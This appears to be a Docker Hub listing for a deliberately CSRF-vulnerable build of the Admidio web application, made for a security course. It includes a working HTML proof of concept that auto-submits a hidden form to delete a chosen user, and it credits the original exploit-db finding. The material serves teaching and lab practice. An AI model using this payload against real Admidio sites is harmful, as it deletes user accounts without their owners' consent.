A CSRF vulnerable Admidio
190
This is a CSRF vulnerable version of admidio.
A known vulnerable page is /adm_program/modules/members/members_function.php, and a PoC for could be:
<html>
<body onload="javascript:document.forms[0].submit()">
<form
action="http://{site address}/adm_program/modules/members/members_function.php">
<input type="hidden" name="usr_id" value='{id of user to delete}' />
<input type="hidden" name="mode" value="3" />
</form>
</body>
</html>
Credit to Faiz Ahmed Zaidi for finding the vulnerability: https://www.exploit-db.com/exploits/42005
For CSEC380
Content type
Image
Digest
sha256:11d616438…
Size
309.1 MB
Last updated
almost 3 years ago
docker pull patrickelser/csrf-admidio